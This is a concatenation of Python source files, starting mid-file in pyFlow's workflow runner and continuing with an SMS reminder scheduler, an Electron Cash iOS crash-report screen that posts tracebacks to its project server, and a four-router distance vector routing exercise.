                for task in self._tdag.getAllNodes(namespace) :
                    updateStatusFromTask(task, status)
        else :
            for l in labels :
                if not self._tdag.isTaskPresent(namespace, l) :
                    raise Exception("Task: '%s' is not in taskDAG" % (namespaceJoin(namespace, l)))
                task = self._tdag.getTask(namespace, l)
                updateStatusFromTask(task, status)


    def _waitForTasksCore(self, namespace, labels=None, isVerbose=True) :
        labels = setzer(labels)
        if isVerbose :
            msg = "Pausing %s until completion of" % (namespaceLabel(namespace))
            if len(labels) == 0 :
                self._infoLog(msg + " its current tasks")
            else:
                self._infoLog(msg + " task(s): %s" % (",".join([namespaceJoin(namespace, l) for l in labels])))

        class WaitStatus:
            def __init__(self) :
                self.isAllTaskDone = True
                self.retval = 0

        ewaiter = ExpWaiter(1, 1.7, 15)
        while True :
            if self._isWorkflowStopped() :
                raise WorkflowRunner._AbortWorkflowException
            status = WaitStatus()
            self._getWaitStatus(namespace, labels, status)
            if status.isAllTaskDone or (status.retval != 0) : break
            ewaiter.wait()

        if isVerbose :
            msg = "Resuming %s" % (namespaceLabel(namespace))
            self._infoLog(msg)
        return status.retval


    def _isTaskCompleteCore(self, namespace, taskLabel) :
        """
        @return: A boolean tuple specifying (task is done, task finished with error)
        """
        if not self._tdag.isTaskPresent(namespace, taskLabel) :
            return (False, False)

        # Run a task harvest just before checking the task status
        # to help ensure the status is up to date
        self._tman.harvestTasks()

        task = self._tdag.getTask(namespace, taskLabel)
        return ( task.isDone(), task.isError() )


    def _cancelTaskTreeCore(self, namespace, taskLabel) :
        if not self._tdag.isTaskPresent(namespace, taskLabel) :
            return
        task = self._tdag.getTask(namespace, taskLabel)
        self._tman.cancelTaskTree(task)


    @staticmethod
    def _checkTaskLabel(label) :
        # sanity check label:
        if not isinstance(label, str) :
            raise Exception ("Task label is not a string")
        if label == "" :
            raise Exception ("Task label is empty")
        if not re.match("^[A-Za-z0-9_-]+$", label) :
            raise Exception ("Task label is invalid due to disallowed characters. Label: '%s'" % (label))


    def _startTaskManager(self) :
        # Start a new task manager if one isn't already running. If it is running
        # provide a hint that a new task has just been added to the workflow.
        #
        if (self._tman is not None) and (self._tman.is_alive()) :
            self._tdag.isFinishedEvent.set()
            return
        if not self._cdata().isTaskManagerException :
            self._tman = TaskManager(self._cdata(), self._tdag)
            self._tman.start()


    def _notify(self, msg, logState) :
        # msg is printed to log AND sent to any email or other requested
        # notification systems:
        self._flowLog(msg, logState)
        self._cdata().emailNotification(msg, self._flowLog)


    def _flushFileWriters(self) :
        """
        Some file updates are buffered on separate threads to improve
        workflow performance. This function provides a central point to
        request that all such buffers are flushed.
        """
        self._taskInfoWriter.flush()
        self._taskStatusWriter.flush()


    def _killWorkflow(self, errorMsg) :
        self._notify(errorMsg, logState=LogState.ERROR)
        self._flushFileWriters()
        self._shutdownAll(timeoutSec=10)
        sys.exit(1)


    def _shutdownAll(self, timeoutSec) :
        # Try to shut down the task manager, all command-tasks,
        # and all sub-workflow tasks.
        #
        if (self._tman is None) or (not self._tman.is_alive()) : return
        StoppableThread.stopAll()
        self._stopAllWorkflows()
        self._tman.stop()
        for _ in range(timeoutSec) :
            time.sleep(1)
            if not self._tman.is_alive() :
                self._infoLog("Task shutdown complete")
                return
        self._infoLog("Task shutdown timed out")


    def _cdata(self) :
        # We're doing this convoluted setup only to avoid having a
        # ctor for ease of use by the client. See what pyFlow goes
        # through for you client code??
        #
        try:
            return self._constantData
        except AttributeError:
            self._constantData = WorkflowRunnerThreadSharedData()
            return self._constantData


    # TODO: Better definition of the status thread shutdown at the end of a pyflow run to
    # prevent race conditions -- ie. what happens if the status update is running while
    # pyflow is shutting down? Every method called by the status updater should be safety
    # checked wrt this issue.
    #
    def _runUpdate(self, runStatus) :
        while True :
            time.sleep(self.updateInterval * 60)

            status = self._tdag.getTaskStatus()
            isSpecComplete = (runStatus.isSpecificationComplete.isSet() and status.isAllSpecComplete)
            report = []
            report.append("===== " + self._whoami() + " StatusUpdate =====")
            report.append("Workflow specification is complete?: %s" % (str(isSpecComplete)))
            report.append("Task status (waiting/queued/running/complete/error): %i/%i/%i/%i/%i"
                          % (status.waiting, status.queued, status.running, status.complete, status.error))
            report.append("Longest ongoing queued task time (hrs): %.4f" % (status.longestQueueSec / 3600.))
            report.append("Longest ongoing queued task name: '%s'" % (status.longestQueueName))
            report.append("Longest ongoing running task time (hrs): %.4f" % (status.longestRunSec / 3600.))
            report.append("Longest ongoing running task name: '%s'" % (status.longestRunName))

            report = [ "[StatusUpdate] " + line for line in report ]
            self._infoLog(report)

            # Update interval is also an appropriate interval to dump a stack-trace of all active
            # threads. This is a useful post-mortem in the event of a large class of hang/deadlock
            # errors:
            #
            stackDumpFp = open(self._cdata().stackDumpLogFile, "a")

            # create one fully decorated line in the stack dump file as a prefix to the report:
            linePrefixOut = "[%s] [StackDump]" % (self._cdata().getRunid())
            ofpList = [stackDumpFp]
            log(ofpList, "Initiating stack dump for all threads", linePrefixOut)

            stackDump(stackDumpFp)
            hardFlush(stackDumpFp)
            stackDumpFp.close()


    def _runWorkflow(self, param) :
        #
        # Primary workflow logic when nothing goes wrong:
        #
        self._setupWorkflow(param)

        self._initMessage()

        runStatus = RunningTaskStatus(self._tdag.isFinishedEvent)

        # start status update reporter:
        #
        # TODO: stop this thread at end of run
        #
        if(self.updateInterval > 0) :
            hb = threading.Thread(target=WorkflowRunner._runUpdate, args=(self, runStatus))
            hb.setDaemon(True)
            hb.setName("StatusUpdate-Thread")
            hb.start()

        # run workflow() function on a separate thread, using exactly
        # the same method we use for sub-workflows:
        #
        # TODO: move the master workflow further into the code path used by sub-workflows,
        # so that we aren't replicating polling and error handling code in this function:
        #
        trun = WorkflowTaskRunner(runStatus, "masterWorkflow", self, self._cdata().flowLog, None)

        trun.start()
        # can't join() because that blocks SIGINT
        ewaiter = ExpWaiter(1, 1.7, 15, runStatus.isComplete)

        def isWorkflowRunning() :
            """
            Return true so long as the primary workflow threads
            (TaskRunner and TaskManager) are still alive
            """
            return trun.is_alive() or ((self._tman is not None) and self._tman.is_alive())

        while isWorkflowRunning() :
            ewaiter.wait()

        if not runStatus.isComplete.isSet() :
            # if not complete then we don't know what happened, very bad!:
            runStatus.errorCode = 1
            runStatus.errorMessage = "Thread: '%s', has stopped without a traceable cause" % (trun.getName())

        self._flushFileWriters()

        return self._evalWorkflow(runStatus)


    def _setupWorkflow(self, param) :
        cdata = self._cdata()

        # setup instance user parameters:
        cdata.setupNewRun(param)

        # setup other instance data:
        self._tdag = TaskDAG(cdata.param.isContinue, cdata.param.isForceContinue, cdata.param.isDryRun,
                             cdata.taskInfoFile, cdata.taskStateFile, cdata.param.workflowClassName,
                             cdata.param.startFromTasks, cdata.param.ignoreTasksAfter, cdata.param.resetTasks,
                             self._flowLog)
        self._tman = None

        def backupFile(inputFile) :
            """
            backup old state files if they exist
            """
            if not os.path.isfile(inputFile) : return
            fileDir = os.path.dirname(inputFile)
            fileName = os.path.basename(inputFile)
            backupDir = os.path.join(fileDir, "backup")
            ensureDir(backupDir)
            backupFileName = fileName + ".backup_before_starting_run_%s.txt" % (cdata.getRunid())
            backupFile = os.path.join(backupDir, backupFileName)
            shutil.copyfile(inputFile, backupFile)

        backupFile(cdata.taskStateFile)
        backupFile(cdata.taskInfoFile)

        self._taskInfoWriter = TaskFileWriter(self._tdag.writeTaskInfo)
        self._taskStatusWriter = TaskFileWriter(self._tdag.writeTaskStatus)

        self._tdag.isWriteTaskInfo = self._taskInfoWriter.isWrite
        self._tdag.isWriteTaskStatus = self._taskStatusWriter.isWrite

        self._taskInfoWriter.start()
        self._taskStatusWriter.start()

        if cdata.param.isContinue :
            # Make workflow changes required when resuming after an interrupt, where the client
            # has requested the workflow continue from where it left off (ie. 'isContinued')
            self._tdag.setupContinuedWorkflow()


    def _initMessage(self) :
        param = self._cdata().param  # shortcut
        msg = ["Initiating pyFlow run"]
        msg.append("pyFlowClientWorkflowClass: %s" % (param.workflowClassName))
        msg.append("pyFlowVersion: %s" % (__version__))
        msg.append("pythonVersion: %s" % (pythonVersion))
        msg.append("WorkingDir: '%s'" % (self._cdata().cwd))
        msg.append("ProcessCmdLine: '%s'" % (cmdline()))

        parammsg = ["mode: %s" % (param.mode),
                    "nCores: %s" % (str(param.nCores)),
                    "memMb: %s" % (str(param.memMb)),
                    "dataDir: %s" % (str(param.dataDir)),
                    "isDryRun: %s" % (str(param.isDryRun)),
                    "isContinue: %s" % (str(param.isContinue)),
                    "isForceContinue: %s" % (str(param.isForceContinue)),
                    "mailTo: '%s'" % (",".join(param.mailTo))]
        for i in range(len(parammsg)):
            parammsg[i] = "[RunParameters] " + parammsg[i]
        msg += parammsg
        self._infoLog(msg)


    def _getTaskErrorsSummaryMsg(self, isForceTaskHarvest=False) :
        # isForceHarvest means we try to force an update of the shared
        # taskError information in case this thread is ahead of the
        # task manager.
        if isForceTaskHarvest :
            if (self._tman is not None) and (self._tman.is_alive()) :
                self._tman.harvestTasks()

        if not self._cdata().isTaskError() : return []
        # this case has already been emailed in the TaskManager @ first error occurrence:
        msg = ["Worklow terminated due to the following task errors:"]
        for task in self._cdata().taskErrors :
            msg.extend(task.getTaskErrorMsg())
        return msg


    def _evalWorkflow(self, masterRunStatus) :

        isError = False
        if self._cdata().isTaskError() :
            msg = self._getTaskErrorsSummaryMsg()
            self._errorLog(msg)
            isError = True

        if masterRunStatus.errorCode != 0 :
            eMsg = lister(masterRunStatus.errorMessage)
            if (len(eMsg) > 1) or (len(eMsg) == 1 and eMsg[0] != "") :
                msg = ["Failed to complete master workflow, error code: %s" % (str(masterRunStatus.errorCode))]
                msg.append("errorMessage:")
                msg.extend(eMsg)
                self._notify(msg, logState=LogState.ERROR)
            isError = True

        if self._cdata().isTaskManagerException :
            # this case has already been emailed in the TaskManager:
            self._errorLog("Workflow terminated due to unhandled exception in TaskManager")
            isError = True

        if (not isError) and (not self._tdag.isRunComplete()) :
            msg = "Workflow terminated with unknown error condition"
            self._notify(msg, logState=LogState.ERROR)
            isError = True

        if isError: return 1

        elapsed = int(time.time() - self.runStartTimeStamp)
        msg = []
        if self._cdata().param.successMsg is not None :
            msg.extend([self._cdata().param.successMsg, ""])
        msg.extend(["Workflow successfully completed all tasks",
                    "Elapsed time for full workflow: %s sec" % (elapsed)])
        self._notify(msg, logState=LogState.INFO)

        return 0


    def _requireInWorkflow(self) :
        """
        check that the calling method is being called as part of a pyflow
        workflow() method only
        """
        if not self._getRunning():
            raise Exception("Method must be a (call stack) descendant of WorkflowRunner workflow() method (via run() method)")


    def _initRunning(self):
        try :
            assert(self._isRunning >= 0)
        except AttributeError :
            self._isRunning = 0

    @lockMethod
    def _setRunning(self, isRunning) :
        self._initRunning()
        if isRunning :
            self._isRunning += 1
        else :
            self._isRunning -= 1

    @lockMethod
    def _getRunning(self) :
        self._initRunning()
        return (self._isRunning > 0)



if __name__ == "__main__" :
    help(WorkflowRunner)
# ===== schedules.py =====
"""schedules: schedules all scheduled tasks, maintenance and time based requests

Provides a variety of classes to hold scheduled tasks, update them and
answer queries about them.

Copyright (c) 2020 by Jeff Bass.
License: MIT, see LICENSE for more details.
"""
import sys
import pprint
import logging
import schedule
import threading
import subprocess
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import deque

from helpers.comms.gmail import Gmail
from helpers.utils import YamlOptionsError

log = logging.getLogger(__name__)


class Schedule:
    """ Methods and attributes to manage schedules.

    Reads the ``schedules`` section of the YAML settings, registers each
    timed event with the ``schedule`` library, and runs pending jobs in a
    daemon thread.

    Parameters:
        settings (Settings object): settings object created from YAML file
        gmail (Gmail object): Gmail interface used to deliver SMS messages
    """
    def __init__(self, settings, gmail):
        # get schedules dictionary from yaml file
        schedules = settings.schedules
        self.gmail = gmail
        if schedules:  # at least one scheduled item in yaml
            schedule_types = self.load_schedule_data(schedules)  # e.g., reminders
            s = self.setup_schedule(schedule_types)
            self.schedule_run(s)  # run a thread that runs scheduled tasks

    def load_schedule_data(self, schedules):
        """ load schedule data from yaml file dictionary

        Parameters:
            schedules (dict): schedule items in yaml file

        Returns:
            schedule_types (list): list of all the requested (non-empty)
                schedule sections, in canonical order
        """
        schedule_types = []
        valid_schedule_types = ['backups', 'reminders']
        for s_type in valid_schedule_types:
            sched = schedules.get(s_type, {})
            if sched:  # only keep sections that actually have entries
                schedule_types.append(sched)
        return schedule_types

    def setup_schedule(self, schedule_types):
        """ register every timed event found in the yaml schedule sections

        Currently only 'send message' events (those with a 'message' key)
        are registered; each listed time becomes a daily SMS job.

        Parameters:
            schedule_types (list): schedule items in yaml file

        Returns:
            schedule (module): the ``schedule`` module with all jobs queued
        """
        for event_type in schedule_types:  # e.g., reminders, backups, etc.
            for _, event_specs in event_type.items():  # events are nested dictionaries from yaml
                if 'message' in event_specs:  # this event action is 'send message'
                    # days = event_specs.get('days', 'all')  # maybe in future?
                    times = event_specs.get('times', [])  # list of times in strings, like '10:30'
                    message = event_specs.get('message', '')
                    channel = event_specs.get('channel', '')  # read but not used yet
                    phone = event_specs.get('phone', '')
                    for t in times:
                        # send the same SMS every day at each listed time
                        schedule.every().day.at(t).do(self.send_sms, phone, message)
        return schedule

    def send_sms(self, phone, message):
        """ send an SMS message

        Sends an SMS message using the Gmail SMS interface.

        Parameters:
            phone (str): phone number to send SMS message to
            message (str): message to send via SMS
        """
        self.gmail.gmail_send_SMS(phone, message)

    def run_backups(self, source, destination):
        # a possible setup of the backup section of schedules is in example3.yaml
        pass

    def schedule_run(self, schedule):
        """ run all scheduled jobs that have been setup in schedule

        Parameters:
            schedule (schedule object): contains all scheduled jobs
        """
        if len(schedule.jobs):  # no need to start thread if no jobs in queue
            t = threading.Thread(target=self.scheduler_thread)
            t.daemon = True  # allows this thread to be auto-killed on program exit
            t.name = 'Scheduler Thread'  # naming the thread helps with debugging
            t.start()

    def scheduler_thread(self):
        """ endless loop: run any pending scheduled jobs, polling once per second """
        while True:
            schedule.run_pending()
            sleep(1)
# ===== crashreporter.py =====
#
# This file is:
#     Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
from . import utils
from . import gui
from electroncash.i18n import _
from .uikit_bindings import *
from .custom_objc import *
import json, traceback, requests, sys
from electroncash import PACKAGE_VERSION

# HTML template used both for the on-screen report preview and for the
# human-readable portion of the submitted crash report.
issue_template = """<font face=arial color="#414141">
<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electron Cash version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
</font>
"""

#BauerJ's testing server
#report_server = "https://crashhubtest.bauerj.eu/crash"
# "Live" (Marcel's server)
report_server = "https://crashhub.devault.cc/crash"

# Module-level reference to the single live CrashReporterVC instance
# (set in viewDidLoad, cleared in dealloc).
Singleton = None


# iOS view controller (ObjC-bridged) that previews and submits crash reports.
# NOTE(review): CrashReporterBase and the @objc_method machinery come from the
# .uikit_bindings / .custom_objc star-imports above — not visible here.
class CrashReporterVC(CrashReporterBase):
    @objc_method
    def dealloc(self) -> None:
        # Clear the module singleton and any python-side state attached to us.
        global Singleton
        Singleton = None
        utils.nspy_pop(self)
        send_super(__class__, self, 'dealloc')

    @objc_method
    def viewDidLoad(self) -> None:
        send_super(__class__, self, 'viewDidLoad')
        global Singleton
        Singleton = self
        # Set up static UI text; .translate({ord(':'):None}) strips the
        # trailing ':' from translated strings reused from other screens.
        self.report.text = ""
        self.reportTit.setText_withKerning_(_("Report Contents"), utils._kern)
        self.descTit.setText_withKerning_(_("Please briefly describe what led to the error (optional):").translate({ord(':'):None}), utils._kern)
        utils.uilabel_replace_attributed_text(self.errMsg,
                                              _('Sorry!') + " " + _('Something went wrong running DeLight.') + " " + _('To help us diagnose and fix the problem, you can send us a bug report that contains useful debug information:').translate({ord(':'):None}),
                                              font = UIFont.italicSystemFontOfSize_(12.0)
                                              )
        self.descDel.placeholderFont = UIFont.italicSystemFontOfSize_(14.0)
        self.descDel.font = UIFont.systemFontOfSize_(14.0)
        self.descDel.placeholderText = _('Tap to enter text...')
        self.descDel.text = ""
        self.title = _('Crash Reporter')

    @objc_method
    def viewWillAppear_(self, animated : bool) -> None:
        send_super(__class__, self, 'viewWillAppear:', animated, argtypes=[c_bool])
        # Auto-scroll the scroll view when the keyboard appears.
        self.kbas = utils.register_keyboard_autoscroll(self.sv)
        # Below will be enabled if we have valid exception info
        self.sendBut.setEnabled_(False)
        utils.uiview_set_enabled(self.sendBut, False)

    @objc_method
    def viewWillDisappear_(self, animated : bool) -> None:
        send_super(__class__, self, 'viewWillDisappear:', animated, argtypes=[c_bool])
        if self.kbas:
            utils.unregister_keyboard_autoscroll(self.kbas)
            self.kbas = 0

    @objc_method
    def viewDidAppear_(self, animated : bool) -> None:
        send_super(__class__, self, 'viewDidAppear:', animated, argtypes=[c_bool])
        # Only enable the Send button once exception info has been attached
        # to this controller via Set().
        ei = _Get(self)
        if ei:
            self.report.attributedText = utils.nsattributedstring_from_html(_get_report_string(self))
            self.sendBut.setEnabled_(True)
            utils.uiview_set_enabled(self.sendBut, True)

    @objc_method
    def onSendBut_(self, sender) -> None:
        # Runs in the WaitingDialog's worker; returns the server's reply text.
        def SendReport() -> str:
            reportDict = _get_traceback_info(self)
            reportDict.update(_get_additional_info(self))
            report = json.dumps(reportDict)
            #reportPretty = json.dumps(reportDict, indent=4)
            #utils.NSLog("Report contents: %s", reportPretty)
            response = requests.post(report_server, data=report)
            return response.text
        def onOk() -> None:
            self.presentingViewController.dismissViewControllerAnimated_completion_(True, None)
        def OnSuccess(response : str) -> None:
            utils.NSLog("Response from server: %s", response)
            # Truncate long replies and strip any HTML before showing them.
            response = response.strip()
            if len(response) > 255:
                response = response[:255] + "..."
            try:
                response = str(utils.nsattributedstring_from_html(response).string)
            except:
                pass
            parent().show_message(message = response, title=_("Report Sent"), vc = self, onOk=onOk)
        def OnError(exc) -> None:
            # exc is a sys.exc_info()-style tuple; show the exception value.
            parent().show_error(message = str(exc[1]), vc = self)
        utils.WaitingDialog(self, _("Sending Report..."), SendReport, OnSuccess, OnError)


# --- module-level helpers -------------------------------------------------

def _Get(vc: CrashReporterVC) -> tuple:
    # Retrieve the sys.exc_info() tuple previously attached with Set().
    return utils.nspy_get_byname(vc, 'exc_info')

def Set(vc : CrashReporterVC, exc_info : tuple) -> None:
    # Attach a sys.exc_info() tuple to the view controller instance.
    utils.nspy_put_byname(vc, exc_info, 'exc_info')

def parent() -> object:
    # The app-wide ElectrumGui singleton.
    return gui.ElectrumGui.gui

def _get_traceback_info(vc : CrashReporterVC) -> dict:
    # Build the traceback portion of the report from the attached exc_info.
    ei = _Get(vc)
    if not ei: return dict()
    exc_string = str(ei[1])
    stack = traceback.extract_tb(ei[2])
    readable_trace = "".join(traceback.format_list(stack))
    # Identify the innermost frame where the exception surfaced.
    ident = {
        "file": stack[-1].filename,
        "name": stack[-1].name,
        "type": ei[0].__name__
    }
    return {
        "exc_string": exc_string,
        "stack": readable_trace,
        "id": ident
    }

def _get_additional_info(vc : CrashReporterVC) -> dict:
    # Environment details (versions, OS, locale, user description).
    import platform
    bundleVer = "iOS Build: " + str(NSBundle.mainBundle.objectForInfoDictionaryKey_("CFBundleVersion"))
    #xtraInfo = bundleVer + "\niOS Version String: " + utils.ios_version_string() + "\n\n"
    args = {
        "app_version": PACKAGE_VERSION + (" (%s)"%bundleVer),
        "python_version": sys.version,
        "os": platform.platform() + " " + utils.ios_version_string(),
        "wallet_type": "unknown",
        "locale": (parent().language or 'UNK'),
        "description": (vc.descDel.text if vc.descDel.text else "")
    }
    # presumably the server limits this field to 255 chars — TODO confirm
    if len(args['os']) > 255:
        args['os'] = args['os'][:255]
    try:
        args["wallet_type"] = parent().wallet.wallet_type
    except:
        # Maybe the wallet isn't loaded yet
        pass
    return args

def _get_report_string(vc : CrashReporterVC) -> str:
    # Render the full HTML report preview; empty string if no exc_info set.
    info = _get_additional_info(vc)
    ei = _Get(vc)
    if not ei: return ""
    info["traceback"] = "".join(traceback.format_exception(*ei))
    return issue_template.format(**info)

'''
th = None
def Test():
    # testing
    import time
    def duh() -> None:
        raise Exception("A random exception!!")
    utils.call_later(2.0, duh)
    utils.call_later(3.0, duh)
    #utils.call_later(10.0, duh)
    def duh2() -> None:
        global th
        def thrd():
            global th
            try:
                utils.NSLog("In another thread.. sleeping 5 secs")
                print(th)
                time.sleep(5.0)
                utils.NSLog("Woke up.. raising exception...")
                raise Exception("From another thread!!")
            finally:
                th = None
        import threading
        th = threading.Thread(target=thrd, name="Exception thread...", daemon=True)
        th.start()
    utils.call_later(5.0, duh2)
'''
# ===== R4.py =====
"""R4.py - Distance Vector Routing node R4.

Builds a TCP mesh from config.txt, measures RTT-based link latencies,
then runs 3 iterations of Bellman-Ford routing-table exchange and prints
the resulting route for every destination.
"""
import socket
import threading
import time
import sys

# Define constant parameters
ALL_CONN = [8080, 8181, 8282, 8383]   # server port of each router R1..R4
SERVER_PORT = 8383
IP_ADDR = "127.0.40.1"
ADDR = (IP_ADDR, SERVER_PORT)
# Client-side bind addresses start at IP_ADDR with the last octet bumped by 1
CLIENT_ADDR = list(IP_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
CONFIG_PATH = "config.txt"
NODE_NUM = 4                          # this node is R4
PING_MSG = "abcdef"
PACKET_SIZE = 1024
FORMAT = "utf-8"
FACTOR = 10e3                         # scales RTT seconds into display units
UPPER_BOUND = 10e7                    # "infinite" cost for unconnected links

# define global variables
server = socket.socket()
client_sockets = []                   # [(peer_addr, conn), ...] accepted by our server
client = [None] * 4                   # outgoing sockets, filled by createClient()
client_addrs = []                     # peer ports of client_sockets, set in main()

# Initialize global router table: [destination, cost, next hop] per node.
# NOTE: each row must be a distinct list -- using [...] * 4 would alias one
# inner list four times, so an updateRT() mutation would corrupt every row.
rt = [['nil', -1, 'nil'] for _ in range(4)]
rt[NODE_NUM - 1] = [str('R' + str(NODE_NUM)), 0, str('R' + str(NODE_NUM))]
latencies = [0.0] * 4


def getTopology():
    """Read config.txt and return [[peer_ip, peer_port], ...] for links
    that involve this node."""
    connections = []
    with open(CONFIG_PATH, "r") as file:          # closes the file on all paths
        for line in file:
            words = line.strip().split(" ")
            if len(words) < 2:                    # skip blank/короткие lines
                continue
            ip_1, port_1 = words[0].split(":")
            ip_2, port_2 = words[1].split(":")
            # Keep the endpoint that is NOT us
            if ip_1 == IP_ADDR:
                connections.append([ip_2, port_2])
            elif ip_2 == IP_ADDR:
                connections.append([ip_1, port_1])
    return connections


def setupServer(connections):
    """Bind/listen on ADDR and accept one connection per configured link."""
    global server
    global client_sockets
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(ADDR)
    server.listen()
    print(f"[LISTENING Server is listening on {IP_ADDR}]")
    time.sleep(5)          # give peers time to start their servers
    for _ in range(len(connections)):
        client_conn, cli_addr = server.accept()
        client_sockets.append([cli_addr, client_conn])
        print(f"[NEW CONNECTION] {cli_addr} connected.")


def createClient(connections):
    """Open one outgoing socket per configured link, each bound to a fresh
    local address (last octet incremented per connection)."""
    global client
    global CLIENT_ADDR
    for i, conn in enumerate(connections):
        addr = (conn[0], int(conn[1]))
        client[i] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client[i].bind((CLIENT_ADDR, SERVER_PORT))
        client[i].connect(addr)
        # bump last octet for the next outgoing socket's bind address
        CLIENT_ADDR = list(CLIENT_ADDR)
        CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
        CLIENT_ADDR = "".join(CLIENT_ADDR)


def listenToPing(conn):
    """Echo one incoming ping so the peer can measure RTT."""
    msg = conn.recv(1024)
    conn.send(msg)


def exchangeLatency(conn, lat_str):
    """Answer one 'EXCHG' request with our comma-separated cost vector."""
    msg = conn.recv(1024).decode(FORMAT)
    if msg == "EXCHG":
        conn.send(lat_str.encode(FORMAT))


def updateRT(index, lat_str):
    """Bellman-Ford relaxation: fold neighbor `index`'s cost vector
    (comma-separated string) into the global routing table `rt`."""
    latency = list(map(float, lat_str.strip().split(",")))
    cost_x = rt[index][1]              # our cost to reach that neighbor
    for i in range(0, 4):
        updated_cost = cost_x + latency[i]
        if rt[i][1] > updated_cost:    # found a cheaper path via neighbor
            rt[i][1] = updated_cost
            rt[i][2] = str("R" + str(index + 1))


def getNextHop(curr_hop, dest, conn):
    """Ask the node behind `conn` for its next hop(s) toward `dest`.
    `curr_hop` is kept for interface compatibility (unused here).
    Returns the reply as a list of hop names."""
    conn.send(str(dest).encode(FORMAT))
    next_hop = conn.recv(1024).decode(FORMAT)
    return next_hop.strip().split(",")


def nextHop(conn):
    """Server loop answering next-hop queries; recurses through the mesh
    by querying the next node until the destination is direct."""
    while 1:
        req_msg = conn.recv(1024).decode(FORMAT)
        dest = int(req_msg)
        next_hop = rt[dest][2]
        # next_hop is like 'R2'; digit char compared against dest's number
        if int(next_hop[1]) != dest + 1:
            next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1]
            next_conn.send(str(dest).encode(FORMAT))
            next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT)
        conn.send(next_hop.encode(FORMAT))


def main():
    global client_addrs

    # STEP-1: obtain the topology details from the config.txt file
    connections = getTopology()
    num_connections = len(connections)
    print("[NETWORK TOPOLOGY] Number of connections =", num_connections)
    for conn in connections:
        print("[NETWORK TOPOLOGY] ", IP_ADDR, " --> ", conn[0], ":", conn[1], sep="")

    # STEP-2: create server and client in threads
    thread = [0] * 2
    thread[0] = threading.Thread(target=setupServer, args=[connections])
    thread[0].start()
    time.sleep(5)
    thread[1] = threading.Thread(target=createClient, args=[connections])
    thread[1].start()
    thread[0].join()
    thread[1].join()
    # ensure the topology is constructed for all nodes
    time.sleep(2)

    # Links not present in the topology get "infinite" cost
    curr_connected = [int(conn[1]) for conn in connections]
    for indx in range(0, len(ALL_CONN)):
        if int(ALL_CONN[indx]) not in curr_connected:
            latencies[indx] = UPPER_BOUND
    latencies[NODE_NUM - 1] = 0

    # STEP-3: measure RTT of directly connected nodes
    ping_threads = [0] * num_connections
    for i in range(0, num_connections):
        ping_threads[i] = threading.Thread(target=listenToPing, args=[client[i]])
        ping_threads[i].start()
    print("[NETWORK TOPOLOGY] Pinging all connected nodes ...")
    for item in client_sockets:
        conn = item[1]
        start = time.time()
        conn.send(PING_MSG.encode(FORMAT))
        ret_msg = conn.recv(1024)
        end = time.time()
        latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR
    for i in range(0, num_connections):
        ping_threads[i].join()
    print("[NETWORK TOPOLOGY] Latencies:", latencies)

    # STEP-4: initialize the routing table from measured latencies
    print("\n[DVR] Initial Routing Table is:")
    print("%-20s %-25s %-20s" % ("Destination", "Cost (Latency)", "Next Hop"))
    for indx in range(0, 4):
        rt[indx] = [str('R' + str(indx + 1)), latencies[indx], str('R' + str(indx + 1))]
        print("%-20s %-25s %-20s" % (rt[indx][0], rt[indx][1], rt[indx][2]))

    # STEP-5: exchange cost vectors and relax the table for 3 iterations
    for loop in range(0, 3):
        print("\n******************* ITERATION -", loop + 1, ": ************************")
        latency_str = ",".join([str(lat[1]) for lat in rt])
        print("\n[DVR] Exchanging Routing Information ...")
        for indx in range(0, 4):
            if indx == NODE_NUM - 1:
                continue
            elif ALL_CONN[indx] not in curr_connected:
                print("[DVR]", rt[NODE_NUM - 1][0], "is not connected to", rt[indx][0])
        # answer peers' EXCHG requests in parallel with making our own
        latency_threads = [0] * num_connections
        for i in range(0, num_connections):
            latency_threads[i] = threading.Thread(target=exchangeLatency, args=[client[i], latency_str])
            latency_threads[i].start()
        request_msg = "EXCHG"
        received_lat_str = ["0,0,0,0"] * 4
        for item in client_sockets:
            conn = item[1]
            conn.send(request_msg.encode(FORMAT))
            received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT)
        for i in range(0, num_connections):
            latency_threads[i].join()
        print("[DVR] Received routing information is:")
        print(received_lat_str)
        # Bellman-Ford relaxation with every received vector
        for indx in range(0, 4):
            if received_lat_str[indx] != "0,0,0,0":
                updateRT(indx, received_lat_str[indx])
        print("\n[DVR] Routing Table after iteration -", loop + 1, "is: ")
        print("%-20s %-25s %-20s" % ("Destination", "Cost (Latency)", "Next Hop"))
        for indx in range(0, 4):
            print("%-20s %-25s %-20s" % (rt[indx][0], rt[indx][1], rt[indx][2]))

    # Print the route for each src-destination pair
    client_addrs = [int(item[0][1]) for item in client_sockets]
    # server side: answer next-hop requests from peers
    hop_threads = [0] * num_connections
    for i in range(0, num_connections):
        hop_threads[i] = threading.Thread(target=nextHop, args=[client[i]])
        hop_threads[i].start()
    hop_list = [rt[NODE_NUM - 1][0]]
    print("\n[DVR] Printing routing information")
    for i in range(0, 4):
        if i != NODE_NUM - 1:
            dest = rt[i][0]
            next_hop = rt[i][2]
            hop_list.append(next_hop)
            # NOTE(review): after the first getNextHop() call, next_hop is a
            # list, so int(next_hop[-1]) relies on the loop terminating after
            # one extension -- verify against a multi-hop topology.
            while dest not in hop_list:
                conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1]
                next_hop = getNextHop(int(next_hop[-1]) - 1, i, conn)
                hop_list.extend(next_hop)
            print(*hop_list, sep=' -> ')
            hop_list = [rt[NODE_NUM - 1][0]]
    # keep hop_threads serving peers a bit longer before exiting
    time.sleep(5)


if __name__ == '__main__':
    main()
# ===== dataloader_iter.py =====
